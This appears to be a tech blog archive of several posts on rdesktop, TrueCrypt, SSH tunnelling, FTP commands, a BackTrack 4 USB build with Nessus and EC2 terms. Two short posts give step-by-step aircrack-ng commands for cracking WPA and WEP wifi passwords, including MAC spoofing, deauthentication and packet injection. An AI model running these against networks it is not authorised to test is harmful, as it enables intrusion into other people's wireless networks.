Categories
Encryption Linux Passwords rdesktop RDP SourceForge TSClient WGET Windows

Using Remote Desktop for Linux with rdesktop

rdesktop client can be used to connect to Windows Terminal Services for Remote Desktop Protocol (RDP) from Linux machines. The rdesktop client supports all version of Microsoft Windows including the latest, Windows Server 2008 and Windows 7 Operating Systems, and it runs on most unix based platforms as well as other ports.

Visit http://sourceforge.net/projects/rdesktop/ for more information or to download rdesktop.

Download and Install:

  1. wget http://garr.dl.sourceforge.net/sourceforge/rdesktop/rdesktop-1.6.0.tar.gz
  2. tar -zxf rdesktop-1.6.0.tar.gz
  3. cd rdesktop-1.6.0
  4. ./configure
  5. make
  6. make install

Basic Usage:

rdesktop -k en-us -a 16 -f -u <username> -p <password> <server>

Command Options Used:

-f switch for full screen mode
-k for keyboard layout on server
-a for color depth
-u for username
-p for password

Note: To exit full screen mode press: CTRL + ALT + Enter

Full Usage Options

Usage: rdesktop [options] server[:port]
-u: user name
-d: domain
-s: shell
-c: working directory
-p: password (- to prompt)
-n: client hostname
-k: keyboard layout on server (en-us, de, sv, etc.)
-g: desktop geometry (WxH)
-f: full-screen mode
-b: force bitmap updates
-L: local codepage
-A: enable SeamlessRDP mode
-B: use BackingStore of X-server (if available)
-e: disable encryption (French TS)
-E: disable encryption from client to server
-m: do not send motion events
-C: use private colour map
-D: hide window manager decorations
-K: keep window manager key bindings
-S: caption button size (single application mode)
-T: window title
-N: enable numlock syncronization
-X: embed into another window with a given id.
-a: connection colour depth
-z: enable rdp compression
-x: RDP5 experience (m[odem 28.8], b[roadband], l[an] or hex nr.)
-P: use persistent bitmap caching
-0: attach to console
-4: use RDP version 4
-5: use RDP version 5 (default)

There is also a graphical user interface (GUI) that you can use named Terminal Server Client [tsclient]
Visit: http://sourceforge.net/projects/tsclient for more information and to download tsclient.

Categories
Aircrack-ng aireplay airmon airodump BackTrack BT crack Encryption hack howto Linux Passwords Ubuntu Video VMWare WEP wifi Windows wireless WPA

HowTo: Crack WPA with Backtrack 3

This is an easy to follow tutorial on how to crack a WPA encrypted password. This information should only be used for education purposes.

Steps:

  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger –mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
  7. aireplay-ng -0 5 -a (bssid)wlan0
  8. aircrack-ng (filename-01.cap)-w (dictionary location)
BackTrack links

Categories
Aircrack-ng aireplay airmon airodump BackTrack BT crack Encryption hack howto Linux Passwords Ubuntu Video VMWare WEP wifi Windows wireless WPA

HowTo: Crack WEP with BackTrack 3

This is a tutorial on how to crack a wep encrypted password. This information should only be used for education purposes.

Steps:

  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger –mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
  7. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
  8. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  9. aircrack-ng -b (bssid) (filename-01.cap)
BackTrack links

Categories
Encryption FREE Linux Open Source Passwords SourceForge TrueCrypt Utility Windows

TrueCrypt – Free Open Source Industrial Strength Encryption

TrueCrypt provides a solution for encrypting sensitive data – everything from portable, mountable volumes to entire hard disks.  Encrypting your data renders that access useless, even if your computer or your thumbdrive falls into the wrong hands.

And TrueCrypt makes it not only easy, but nearly un-crackable.  TrueCrypt is both open source and FREE.

There are two approaches to using TrueCrypt:

  • Whole Drive Encryption – you can use TrueCrypt to encrypt your entire hard disk, including your boot partition. In order to boot the machine, you must first supply your pass phrase to enable decryption. Once booted, data is automatically and transparently encrypted and decrypted as it travels to and from the disk. Once your machine is turned off, the data is unrecoverable without knowing the pass phrase.
  • Container Encryption – with this approach you create a single file on your computer’s hard drive that is encrypted. You then “mount” that file using TrueCrypt, supplying the correct pass phrase to decrypt it after which the contents of that file appear as another drive on your system. Reading from and writing to that “drive” automatically and transparently decrypts and encrypts the data. Once the drive is unmounted, the data is once again unrecoverable without knowing the pass phrase.

TrueCrypt is both simple and elegant.

Most users prefer container based encryption for its portability, and for the fact that you need only mount the encrypted drive when you need access. You could keep personal information in a TrueCrypt container that could be regularly copied between machines, onto a thumbdrive, and even backed up to the Internet. When you need to access the encrypted data, simply mount it, specify your pass phrase to unlock it, and use the files that are stored within it.

TrueCrypt is not tied to any one platform, your user account or anything else; just the pass phrase. In fact, you can copy your encrypted file to another machine entirely and mount it with TrueCrypt. Even using other operating systems such as Mac or Linux.

Here are a couple of important caveats:

  • Encryption does not make a bad pass phrase any more secure. If you choose an obvious pass phrase, an attack can certainly be mounted that could unlock your encrypted volume. This is why we talk about pass phrase instead of password. Use a multi-word phrase that you can remember to be the key to your encrypted data, and it’ll be much, much more difficult to break.
  • An encrypted volume does you no good if the files you care about are also elsewhere on your machine.
  • Make sure you have secure backups, updated regularly. Preferably keep them UNencrypted, but secure in some other way, in case you lose your encrypted volume or forget your pass phrase. If you’ve chosen a good passphrase, without it the data is not recoverable.

TrueCrypt is FREE open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux

TrueCrypt Features:

Data encryption is an important part of an overall security strategy. TrueCrypt can be a key part of that strategy.

Download TrueCrypt.

Categories
Administration BareTail Encryption FREE FTP Grep Linux Notepad++ SSH Utility Windows

32 FREE Windows Administration Utilities

  1. BareTail. A free real-time log file monitoring tool.
  2. CamStudio. Free screen recording software.
  3. CDBurnerXP. Burns CD-ROMs, DVDs, audio CDs, and ISO images.
  4. Comodo Firewall Pro. Is a firewall and antivirus application.
  5. DriveImage XML. Is a program for imaging and backing up partitions and logical drives.
  6. FileZilla. GUI FTP client.
  7. GParted LiveCD. Manages partitions on systems.
  8. InfraRecorder. Burns ISO images and creates data and audio CDs and DVDs.
  9. Lansweeper. Is a network inventory tool that performs hardware scanning, software scanning, and Active Directory (AD) reporting.
  10. LocatePC. Emails you whenever any private or public IP address in your system changes – great for tracking a stolen computer.
  11. MyDefrag (formerly JkDefrag). Defragments and optimizes disks.
  12. Nessus (formerly NeWT). Network/computer vulnerability scanner.
  13. Ngrep. Is a packet sniffer based on finding matching text strings.
  14. Notepad++. Is a text and code editor (more info).
  15. NTFS Undelete. Recovers deleted files that are no longer in the recycle bin.
  16. Open Computers and Software Inventory (OCS Inventory NG). Provides detailed inventory data for an entire network of computers as well as deploys packages.
  17. OpenSSH. Creates secure, encrypted shell sessions.
  18. PageDefrag. Determines how fragmented your paging files and registry hives are, and defragments them.
  19. Paint.NET. Free image and photo editing software for Windows.
  20. PING (Partimage Is Not Ghost) — Backup and Restore Disk Partitions.
  21. PRTG Traffic Grapher. Is a powerful network monitor.
  22. System Information for Windows (SIW). Gathers detailed information about a computer’s system properties, settings, and displays.
  23. TestDisk. Recovers damaged partitions, makes non-bootable disks bootable again, and repairs damaged boot sectors.
  24. TrueCrypt.  Free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux.
  25. WinDirStat. Determines how space is being utilized across disks and visually represents the results in multiple ways.
  26. WinPE (Windows Preinstallation Environment). Lets you make a Windows command-line boot recovery DVD.
  27. WinDump. WinDump is the Windows version of tcpdump, the command line network analyzer for UNIX / Linux.
  28. Winfingerprint. Is a network scanner.
  29. Wink. Builds screencast recordings.
  30. WireShark (formerly Ethereal). Network protocol analyzer.
  31. XML Notepad. Is a specialized XML editor.
  32. ZoomIt. Magnifies portions of a screen and lets you draw on and annotate the screen.
Categories
Encryption Linux Passwords SSH Windows

How to keep your email safe from sniffing

Every time you use public internet facilities and hotspots you may be at risk where others are able to “sniff” or listen in to the wireless network traffic within range and from that, determine account names, servers and passwords from anyone who happens to check email while the “hacker” is looking.

The simplest solution is to use webmail, making sure that it’s on an “https”, secure, connection. This ensures the data is encrypted and safe from any sniffers that happen to see it.

But for many of us, that’s not as optimal as we’d like. We’d like to keep using our regular email program and POP3/IMAP/SMTP servers.

Enter “SSH Tunneling”.

Now, one of the requirements for SSH tunneling is that you have SSH (Secure SHell) access to your mail server. If you do not (and if you don’t know, you probably don’t), you can stop reading now. Check with your ISP if you like, to see if you can get it, but this technique relies on SSH being available on your server.

The good news is that once you have SSH access, there’s no further server-side configuration.

The technique works like this:

  • Using your SSH client or other tools, set up a “tunnel” for ports 25 and 110 on your machine to those same ports on your mail server. This does require that the client or tool be kept running.
  • Configure your mail client to send to and fetch from “localhost” instead of your mail server.

That’s really all there is to it.

Let’s walk through the details for Windows users.

Start by getting PuTTY. Get the ZIP file that contains all the tools, because we’ll be using more than just the PuTTY client.

One of the tools is called “plink”. In a command shell, run the following:

plink -v -L 110:mailserver:110 -L 25:mailserver:25 -2 you@mailserver -N -pw yourpassword

Where:

  • -v: verbose – optional, but it will show you what plink is doing setting up the tunnel, and as long as the tunnel is active.
  • -L 110:mailserver:110: defines a tunnel of port 110 on your local machine to go to port 110 on the mailserver. Port 110 is the POP3 mail service. You would replace “mailserver” with the name of your pop3 server.
  • -L 25:mailserver:25: defines a tunnel of port 25 on your local machine to port 25 on the mailserver. Port 25 is the outgoing SMTP mail port. Again, you would replace “mailserver” with the name of your pop3 server.
  • -2: force ssh v2 protocol only. Optional, but slightly more secure. Use it unless your remote server doesn’t support it.
  • you@mailserver: your ssh login account name @ your mailserver.
  • -N: no shell. Normally plink will also open up an interactive shell. For our purposes here we don’t need one.
  • -pw yourpassword: your password for your ssh login account name. You can also leave this off to be prompted instead.

Leave plink running once it connects.

Now, in your email client (Outlook, Eudora, whatever), change both the POP3 and SMTP servers to “localhost”.

Here’s what happens now: when you reload your email client, it will attempt to, for example, fetch POP3 mail from “localhost, port 110”. Plink is listening to port 110 on your local machine, encrypts the data and sends it to the ssh server running on the mail server. There, the ssh server decrypts the data, and forwards it on to port 110 on the mail server. Data coming back is handled similarly, as is the SMTP port 25 conversation we defined as well.

A couple of additional notes…

You can tunnel other protocols (like mySql, imap, etc…) by adding “-L port:server:port” parameters to the plink line.

You can perform the port forwarding in PuTTY itself, the interactive client if you like – there is a section in the options for that, and it can be saved with the profile for that connection.

Remember that while your email is configured to use “localhost” as the mail server, the tunnel must be running (the plink command must be active). If it is not, email will fail.

This is yet another use for the great FREE utility PuTTY.

Categories
Anti-Spyware Encryption Firewall Internet Linux Passwords Security Spyware SSL Virus Scan WEP wifi Windows Windows Update WPA

Internet Safety: How to keep your computer safe on the Internet

Here are some things you can, and should, do to stay safe.

  • Stay Up-To-Date – Most virus infections don’t have to happen. Software vulnerabilities that the viruses exploit usually already have patches available by the time the virus reaches a computer. The problem? The user simply failed to install the latest patches and updates that would have prevented the infection in the first place. The solution is simple: enable automatic updates, and visit Windows Update periodically. Keeping Windows and other software up-to-date is the most important (and easiest) thing you can do to protect your computer.
  • Get Educated – To be blunt, all the protection in the world won’t save you from yourself. Don’t open attachments that you aren’t positive are okay. Don’t fall for phishing scams. Don’t click on links in email that you aren’t positive are safe. Don’t install “free” software without checking it out first – many “free” packages are free because they come loaded with spyware, adware and worse. When visiting a web site, did you get a pop-up asking if it’s ok to install some software you’re not sure of because you’ve never heard of it? Don’t say “OK”. Not sure about some security warning you’ve been given? Don’t ignore it. Choose strong passwords, and don’t share them with others.
  • Use a Firewall – A firewall is a piece of software or hardware that sits between your computer and the Internet and only allows certain types of traffic to crossl. For example, a firewall may allow checking email and browsing the web, but disallow things that are commonly not as useful such as RPC or “Remote Procedure Calls”.
  • Virus Scan – Sometimes, typically via email, virii are able to cross the firewall and get to your computer anyway. A virus scanner will locate and remove them from your hard disk. A real time virus scanner will notice them as they arrive, even before they hit the disk, but at the cost of slowing down your machine a little. Important: because new virii are arriving every day, it’s important to keep your virus definitions up-to-date. Be sure to enable the scanning software’s automatic-update feature and have it do so every day.
  • Kill Spyware – Spyware is similar to virii in that they arrive unexpected and unannounced and proceed to do something undesired. Normally spyware is relatively benign from a safety perspective, but it can violate your privacy by tracking the web sites you visit, or add “features” to your system that you didn’t ask for. The worst offenders are spyware that hijack normal functions for themselves. For example, some like to redirect your web searches to other sites to try and sell you something. Of course some spyware is so poorly written that it might as well be a virus, given how unstable it can make your system. The good news is that, like virus scanners, there are spyware scanners that will locate and remove the offending software. 
  • Secure Your Mobile Connection – if you’re traveling and using internet hot spots, free Wifi or internet cafes, you must take extra precautions. Make sure that your web email access is via secure (https) connections, or that your regular mail is over an encrypted connection as well. Don’t let people “shoulder surf” and steal your password by watching you type it in a public place. Make sure your home Wifi has WEP or, preferably WPA security enabled if anyone can drive or walk within range.
  • Don’t forget the physical – an old computer adage is that “if it’s not physically secure, it’s not secure.” All of the precautions I’ve listed above are pointless if other people can get at your computer. They may not follow the safety rules I’ve laid out. A thief can easily get at all the unencrypted data on your computer if they can physically get to it. The common scenario is a laptop being stolen, but there are many reports of people who’ve been burned because a family member or roommate accessed their computer without their knowledge. 

It all might seem overwhelming, but it’s not nearly as overwhelming as an actual security problem if and when it happens to you. While we might want it to be otherwise, the practical reality of the internet, and computing today, is that we each must take responsibility for our own security online.

Categories
CLI Command Line Encryption FTP Linux Passwords Windows winscp

FTP – File Transfer Protocol

FTP

File Transfer Protocol

Syntax
FTP [-options] [-s:filename] [-w:buffer] [host]

key
-s:filename Run a text file containing FTP commands.

host Host name or IP address of the remote host.

-g Disable filename wildcards.

-n No auto-login.

-i No interactive prompts during ftp.

-v Hide remote server responses.

-w:buffer Set buffer size to buffer
(default=4096)

-d Debug

-a Use any local interface when binding data connection.


Commands to run at the FTP: prompt

append local-file [remote-file]
Append a local file to a file on the remote computer.

ascii Set the file transfer type to ASCII, the default.
In ASCII text mode, character-set and end-of-line
characters are converted as necessary.

bell Toggle a bell to ring after each command.
By default, the bell is off.

binary Set the file transfer type to binary.
Use `Binary' for transferring executable program
files or binary data files e.g. Oracle

bye End the FTP session and exit ftp

cd Change the working directory on the remote host.

close End the FTP session and return to the cmd prompt.

debug Toggle debugging. When debug is on, FTP will display
every command.

delete remote-file
Delete file on remote host.

dir [remote-directory] [local-file]
List a remote directory's files and subdirectories.
(or save the listing to local-file)

disconnect Disconnect from the remote host, retaining the ftp prompt.

get remote-file [local-file]
Copy a remote file to the local PC.

glob Toggle the use of wildcard characters in local pathnames.
By default, globbing is on.

hash Toggle printing a hash (#) for each 2K data block transferred.
By default, hash mark printing is off.

help [command]
Display help for ftp command.

lcd [directory]
Change the working directory on the local PC.
By default, the working directory is the directory in which ftp was started.

literal argument [ ...]
Send arguments, as-is, to the remote FTP host.

ls [remote-directory] [local-file]
List a remote directory's files and folders.
(short format)

mdelete remote-files [ ...]
Delete files on remote host.

mdir remote-files [ ...] local-file
Display a list of a remote directory's files and subdirectories.
(or save the listing to local-file)
Mdir allows you to specify multiple files.

mget remote-files [ ...]
Copy multiple remote files to the local PC.

mkdir directory
Create a directory on the remote host.

mls remote-files [ ...] local-file
List a remote directory's files and folders.
(short format)

mput local-files [ ...]
Copy multiple local files to the remote host.

open computer [port]
Connects to the specified FTP server.

prompt Toggle prompting. Ftp prompts during multiple file transfers to
allow you to selectively retrieve or store files;
mget and mput transfer all files if prompting is turned off.
By default, prompting is on.

put local-file [remote-file]
Copy a local file to the remote host.

pwd Print Working Directory
(current directory on the remote host)

quit End the FTP session with the remote host and exit ftp.

quote argument [ ...]
Send arguments, as-is, to the remote FTP host.

recv remote-file [local-file]
Copy a remote file to the local PC.

remotehelp [command]
Display help for remote commands.

rename filename newfilename
Rename remote files.

rmdir directory
Delete a remote directory.

send local-file [remote-file]
Copy a local file to the remote host.

status Display the current status of FTP connections and toggles.

trace Toggles packet tracing; trace displays the route of each packet

type [type-name]
Set or display the file transfer type:
`binary' or `ASCII' (the default)

If type-name is not specified, the current type is displayed.
ASCII should be used when transferring text files.

In ASCII text mode, character-set and end-of-line
characters are converted as necessary.

Use `Binary' for transferring executable files.

user user-name [password] [account]
Specifes a user to the remote host.

verbose Toggle verbose mode. By default, verbose is on.

! command Run command on the local PC.

? [command] Display help for ftp command.

Examples
an example FTP Script to retrieve files in binary and then ascii mode:

::GetFiles.ftp

[User_id]
[ftp_password]
binary
get /usr/file1.exe
get file2.html
mget *.jpeg
ascii
mget *.txt
quit

To run the above script:
FTP -s:GetFiles.ftp [hostname]
This will connect as the user:User_id with password:ftp_password

An FTP Script to publish files in binary mode:

::PutFiles.ftp

[User_id]
[ftp_password]
binary
mput *.html
cd images
mput *.gif
quit

To run the above script:
FTP -s:PutFiles.ftp [hostname]
This will connect as the user:User_id with password:ftp_password


Using the Windows GUI for FTP
Windows Explorer (not Internet Explorer) also has a built in FTP client.
Type in the address bar:

ftp://username@ftpserver.address.com

you will be prompted for the password.
You can also use

ftp://username:password@ftpserver.address.com

This is not recommended as anyone can read the password.

Secure FTP
Standard FTP does not encrypt passwords – they are sent across the network in plain text. A more secure method is to use SecureFTP (SFTP) or SecureCopy (SCP) Freeware clients are available such as WinSCP.

Categories
BackTrack BT Encryption Grep Linux Nessus Passwords SSL Ubuntu VMWare WEP Windows WPA

Backtrack 4 – USB/Nessus Boot with Persistent Changes

This how-to will show you a method for building a USB thumb drive with the following features:
  • Persistent Changes – Files saved and changes made will be kept across reboots.
  • Nessus and NessusClient installed – Everybody needs Nessus
  • Encryption configured (Note: This is not whole drive encryption)

Tools and Supplies

  1. A USB thumbdrive – minimum capacity 4GB
  2. A Backtrack 3 CDROM, Backtrack 4 DVD or an additional USB thumbdrive  (minimum 2GB) – Used to partition the thumbdrive.
  3. Optional: UNetbootin – A tool to transfer an iso image to a USB drive.
Download the Backtrack 4 Pre Release ISO here.
This tutorial is based on booting Backtrack 4 first. This means that you need some form of bootable Backtrack 4 media. This can be a virtual machine, DVD, or USB drive. Use your favorite method of creating a DVD or USB drive or you can use UNetBootin to create the thumb drive.  Below is a screenshot of using UnetBootin to install Backtrack 4 on a USB drive.
Installing Backtrack 4 with UnetBootin
It is as simple as selecting the image we want to write to the USB drive, the drive to write it to, and then clicking the ‘OK’ button. Warning: Make sure you pick the correct destination drive.
Partition the USB thumbdrive
The first step is to boot up Backtrack 4.  With the release of Backtrack 4 Final, a 4 GB drive is required if we are going to enable persistence.  For Backtrack 3 and Backtrack 4 Beta, we could get away with a 2GB drive.  We will also need to figure out which drive is our target drive. The following command will show the drives available and you can determine from that which is the new USB drive:
dmesg | egrep hd.|sd.
We need to partition and format the drive as follows:
  1. The first partition needs to be a primary partition of at least 1.5 GB and set to type vfat. Also remember to make this partition active when you are creating it. Otherwise you might have some boot problems.
  2. The second Partition can be the rest of the thumb drive.
Below are the steps to take to get the drive partitioned and formatted. These steps are taken from this video on Offensive Security website. A ‘# blah blah‘ indicates a comment and is not part of the command and user typed commands are bolded. One note, we will need to delete any existing partitions on the drive.

fdisk /dev/sda # use the appropriate drive letter for your system
# delete existing partitions. There may be more than one.
Command (m for help): d
Partition number (1-4): 1
# create the first partition
Command (m for help): n
Command action
e   extended
p   primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-522, default 1):
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-522, default 522): +1500M
#create the second partition
Command (m for help): n
Command action
e   extended
p   primary partition (1-4)
p
Partition number (1-4): 2
First cylinder (193-522, default 193):
Using default value 193
Last cylinder, +cylinders or +size{K,M,G} (193-522, default 522):
Using default value 522
# Setting the partition type for the first partition to vfat/fat32
Command (m for help): t
Partition number (1-4): 1
Hex code (type L to list codes): b
Changed system type of partition 1 to b (W95 FAT32)
# Setting the partition type for the second partition to Linux
Command (m for help): t
Partition number (1-4): 2
Hex code (type L to list codes): 83
# Setting the first partition active
Command (m for help): a
Partition number (1-4): 1
Command (m for help): w
# now it is time to format the partitions
mkfs.vfat /dev/sdb1
mkfs.ext3 -b 4096 -L casper-rw /dev/sdb2

Two things to notice above in the format commands; 1) we are using ext3 instead of ext2 and 2) you must include the -L casper-rw portion of the command. Being able to use ext3 is great because of journaling. The -L casper-rw option helps us get around the problem we had where we had to enter the partition name in order to get persistence working. As you will see, that is no longer necessary.  So go ahead and partition and format the drive according the layout above.
Make it a bootable Backtrack 4 USB thumb drive
  1. Mount the first partition.
  2. Copy the Backtrack files to it.
  3. Install grub.

Following are the commands to execute. Again, ‘#’ denote comments and user typed commands are in bold.

# mount the first partition, sda1 in my case.
mkdir /mnt/sda1
mount /dev/sda1 /mnt/sda1

# copy the files, you will need to find where the ISO is mounted on your system.
cd /mnt/sda1
rsync -r /media/cdrom0/* .

# install grub
grub-install –no-floppy –root-directory=/mnt/sda1 /dev/sda

That’s it. We now have a bootable Backtrack 4 USB thumb drive.
Persistent Changes
This is done much differently and more easily than it was in Backtrack 4 Beta or Backtrack 3. First of all, for basic persistence, we don’t have to do anything at all. There is already a menu option that takes care of it for us. Unfortunately, it is only for console mode so we need to make a couple changes.  We want to do the following things:
  1. Change the default boot selection to persistent.
  2. Set the resolution for our gui.

To do so, do the following. Again, ‘#’ …comment….user typed…blah blah.

cd /mnt/sda1/boot/grub
vi menu.lst

# change the default line below to ‘default 4′ and append ‘vga=0×317′ (that’s a zero) to the kernel line to set the resolution to 1024×768
# By default, boot the first entry.
default 4
.
.
.
title                Start Persistent Live CD
kernel           /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet vga=0×317
initrd            /boot/initrd.gz

:wq

Here is my entire menu.lst file for reference.

# By default, boot the first entry.
default 4
# Boot automatically after 30 secs.
timeout 30

splashimage=/boot/grub/bt4.xpm.gz
title                Start BackTrack FrameBuffer (1024×768)
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0×317
initrd                /boot/initrd.gz
title                Start BackTrack FrameBuffer (800×600)
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0×314
initrd                /boot/initrd800.gz
title                Start BackTrack Forensics (no swap)
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent rw vga=0×317
initrd                /boot/initrdfr.gz
title                Start BackTrack in Safe Graphical Mode
kernel                /boot/vmlinuz BOOT=casper boot=casper xforcevesa rw quiet
initrd                /boot/initrd.gz

title                Start Persistent Live CD
kernel                /boot/vmlinuz BOOT=casper boot=casper persistent rw quiet vga=0×317

initrd                /boot/initrd.gz
title                Start BackTrack in Text Mode
kernel                /boot/vmlinuz BOOT=casper boot=casper nopersistent textonly rw quiet
initrd                /boot/initrd.gz
title                Start BackTrack Graphical Mode from RAM
kernel                /boot/vmlinuz BOOT=casper boot=casper toram nopersistent rw quiet
initrd                /boot/initrd.gz
title                Memory Test
kernel                /boot/memtest86+.bin
title                Boot the First Hard Disk
root                (hd0)
chainloader +1

Reboot and either select “Start Persistent Live CD” or just wait since we set it to auto-boot to persistent mode. To test it, create a file and reboot again. If your file is still there, everything is golden.
Install Nessus
Download the Ubuntu Nessus and NessusClient packages from nessus.org. The 32-bit 8.10 version worked fine for me.  Again, with Backtrack 4 things are little easier. To install the Nessus server, simply execute the following command to install the package.

dpkg install Nessus-4.0.2-ubuntu810_i386.deb

Things used to be a little bit more complicated for the client, but with the release of the pre-final version, it is just as easy as installing as the server.

dpkg install NessusClient-4.0.2-ubuntu810_i386.deb

Finally it’s time to configure Nessus. Execute each of the following and follow the prompts. My entries are below for fun.

#create server certificate
/opt/nessus/sbin/nessus-mkcert
This script will now ask you the relevant information to create the SSL
certificate of Nessus. Note that this information will *NOT* be sent to
anybody (everything stays local), but anyone with the ability to connect to your
Nessus daemon will be able to retrieve this information.
CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [FR]:US
Your state or province name [none]:Confused
Your location (e.g. town) [Paris]:Somewhere In Time
Your organization [Nessus Users United]:
.
.
.
Congratulations. Your server certificate was properly created.
.
.
# add user
/opt/nessus/sbin/nessus-adduser
Login :Me
Authentication (pass/cert) : [pass]
Login password :
Login password (again) :
Do you want this user to be a Nessus ‘admin’ user ? (can upload plugins, etc…) (y/n) [n]:y
User rules
———-
nessusd has a rules system which allows you to restrict the hosts
that Me has the right to test. For instance, you may want
him to be able to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)
Login             : Me
Password         : ***********
This user will have ‘admin’ privileges within the Nessus server
Rules             :
Is that ok ? (y/n) [y]y
User added

We want to disable Nessus starting at boot. We are going to do some things a little later than require that Nessus not be running at boot.
/usr/sbin/update-rc.d -f nessusd remove

This command does not remove the Nessus start scripts. It only removes the links that cause Nessus to start at boot time.

The next thing we need to do is register our installation so we can get the plugin feed. You need to go here and request a key. That is a link to the free feed for home use. Use appropriately.
Once you have your key. Execute the following to update your plugins. Please note that there are two dashes before register in the nessus-fetch line below. They can display as one sometimes.

/opt/nessus/bin/nessus-fetch register [your feed code here]

When that is done, and it is going to take a few minutes, you are ready to start the server and client. Be aware that with version 4.0, while the command to start returns quickly, the actual starting of the service may take a minute or two. In many cases, I have actually had to reboot before Nessus started working. You can use netstat -na to check that the server is listening on port 1241.

/etc/init.d/nessusd start
/opt/nessus/bin/NessusClient

Configure Encryption
Since we are using this tool to poke at peoples networks and systems, with permission of course, it is very important that the information we find be protected. To do this, we are going to setup an encrypted volume that will eventually become our home directory.
This can be done with the gui or via command line. We will be using the gui because we need to be able to format the volume with ext3 and, as yet, I have not been able to figure out how to do that via the command line on linux.
Truecrypt Configuration (Time 0_00_12;24)
Truecrypt Configuration (Time 0_00_16;18)
Truecrypt Configuration (Time 0_00_28;12)
Truecrypt Configuration (Time 0_00_28;12)
Truecrypt Configuration (Time 0_00_29;00)
Truecrypt_size
Truecrypt Configuration (Time 0_00_41;18)
Truecrypt Configuration (Time 0_00_44;24)
Truecrypt_type
Truecrypt Configuration (Time 0_00_50;18)
You will get a message that the volume was successful created. Click on the ‘OK’ button, then exit the Truecrypt gui, both the ‘Create Volume’ windows and the main windows. We want to be back at the command prompt at this point.
If you want to test the your filesystem, execute the following, note the -k ” is two single quotes, not a double quote:

truecrypt -t -k ” protect-hidden=no /my_secret_stuff /media/truecrypt1
mount
cd /media/truecrypt1
df .

This will show that the volume is mounted and the amount of disk space you have left. Our next step is to have this volume mounted when we log in. We do this by editing the root user’s .profile file. Add the truecrypt command above to root’s .profile so it looks like this:

# ~/.profile: executed by Bourne-compatible login shells.
if [ "$BASH" ]; then
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
fi

truecrypt -t -k '' --protect-hidden=no /my_secret_stuff /media/truecrypt1

mesg n

The next time you reboot you will be asked for the password for the volume and it will be mounted for you.

Now it is time to tweak a few tings

Tweak a few things
The first thing we are going to do is go ahead and configure networking to start at boot time. It’s convenient and easy to disable if we need to. All we have to do is execute the following command.

/usr/sbin/update-rc.d networking defaults

Next thing we want to do is make sure all our tools and the system itself is up-to-date. First execute the following:

apt-get update

This is update the software repository information. Next, execute the this command:

apt-get upgrade

The system will determine if there is anything that needs to be updated and then prompt you to continue. Individual packages can be updated by including the package name after upgrade.
This next bit is interesting and I was surprised it worked. We are going to reset the root user’s home directory during the login process to the mounted truecrypt volume. This will ensure that anything written to the home directory will be encrypted.  The following commands will set this up for us:

cd /media/truecrypt1
rsync -r –links /root/ .
# add the bold lines below
vi /root/.profile

# ~/.profile: executed by Bourne-compatible login shells.
if [ "$BASH" ]; then
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
fi

truecrypt -t -k '' --protect-hidden=no /my_secret_stuff /media/truecrypt1

export HOME=/media/truecrypt1
export HISTFILE=/media/truecrypt1/.bash_history


cd

mesg n

:wq

The next time you reboot, when you are finally in the system, your home directory will be /media/truecrypt1.
There is one last thing we want to do. We want to change nessus to log to the encrypted volume. This is very easy. The file that controls this is /opt/nessus/etc/nessus/nessusd.conf. We need to create a place for the log files to go. So execute the following

cd /media/truecrypt1
mkdir -p nessus/logs

Once you have done that, edit the /opt/nessus/etc/nessus/nessusd.conf file and change this:

.
.
.
# Log file :
logfile = /opt/nessus/var/nessus/logs/nessusd.messages
# Shall we log every details of the attack ? (disk intensive)
log_whole_attack = no
# Dump file for debugging output
dumpfile = /opt/nessus/var/nessus/logs/nessusd.dump
.
.
.

to this:

.
.
.
# Log file :
logfile = /media/truecrypt1/nessus/logs/nessusd.messages
# Shall we log every details of the attack ? (disk intensive)
log_whole_attack = no
# Dump file for debugging output
dumpfile = /media/truecrypt1/nessus/logs/nessusd.dump
.
.
.

That’s it. You are all done now.

BackTrack links
Categories
Amazon Web Services AWS CLI Command Line EC2 Encryption Linux S3 SSL Windows

Glossary of Amazon EC2 terms

Amazon machine image (AMI)
An Amazon Machine Image (AMI) is an encrypted machine image stored in Amazon S3. It contains all the information necessary to boot instances of your software.

Amazon EBS
A type of storage that enables you to create volumes that can be mounted as devices by Amazon EC2 instances. Amazon EBS volumes behave like raw unformatted external block devices. They have user supplied device names and provide a block device interface. You can load a file system on top of Amazon EBS volumes, or use them just as you would use a block device.

Availability Zone
A distinct location within a region that is engineered to be insulated from failures in other Availability Zones and provides inexpensive, low latency network connectivity to other Availability Zones in the same region.

compute unit
An Amazon-generated measure that enables you to evaluate the CPU capacity of different Amazon EC2 instance types.

EBS
See Amazon EBS.

Elastic Block Store
See Amazon EBS.

elastic IP address
A static public IP address designed for dynamic cloud computing. Elastic IP addresses are associated with your account, not specific instances. Any elastic IP addresses that you associate with your account remain associated with your account until you explicitly release them. Unlike traditional static IP addresses, however, elastic IP addresses allow you to mask instance or Availability Zone failures by rapidly remapping your public IP addresses to any instance in your account.

ephemeral store
See instance store.

explicit launch permission
Launch permission granted to a specific user.

group
See security group.

instance store
Every instance includes a fixed amount of storage space on which you can store data. This is not designed to be a permanent storage solution. If you need a permanent storage system, use Amazon EBS.

instance type
A specification that defines the memory, CPU, storage capacity, and hourly cost for an instance. Some instance types are designed for standard applications while others are designed for CPU-intensive applications.

